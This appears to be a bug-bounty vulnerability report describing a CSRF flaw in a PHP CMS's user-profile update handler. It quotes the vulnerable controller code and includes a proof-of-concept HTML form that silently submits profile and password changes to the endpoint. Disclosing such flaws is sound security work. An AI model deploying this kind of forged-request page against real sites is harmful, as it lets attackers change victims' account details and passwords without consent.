Lucene search
Breakalegcml166006A4-ABBB-4644-98F2-4E0F33F63713HistoryJul 30, 2022 - 11:04 a.m.
CSRF vulnerability exists in modifying user information (including password)
2022-07-3011:04:15
breakalegcml
www.huntr.dev
8
Description
Csrf vulnerability in user information modification page
Proof of Concept
In \app\home\c\UserController
$re = M('member')->update(['id'=>$this->member['id']],$w);
$member = M('member')->find(['id'=>$this->member['id']]);
unset($member['pass']);
$_SESSION['member'] = array_merge($_SESSION['member'],$member);
if($this->frparam('ajax')){
JsonReturn(['code'=>0,'msg'=>JZLANG('修改成功!')]);
}
Error(JZLANG('修改成功!'));
// PoC.html
var payload = ...
```<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/user/userinfo.html" method="POST">
<input type="hidden" name="username" value="rA5OOQ" />
<input type="hidden" name="sex" value="0" />
<input type="hidden" name="litpic" value="" />
<input type="hidden" name="file_litpic" value="" />
<input type="hidden" name="tel" value="111111111111" />
<input type="hidden" name="email" value="111111123" />
<input type="hidden" name="province" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="address" value="" />
<input type="hidden" name="signature" value="" />
<input type="hidden" name="birthday" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="repassword" value="" />
<input type="hidden" name="invite" value="http://localhost/login/register.html?invite=1" />
<input type="hidden" name="submit" value="��¤" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>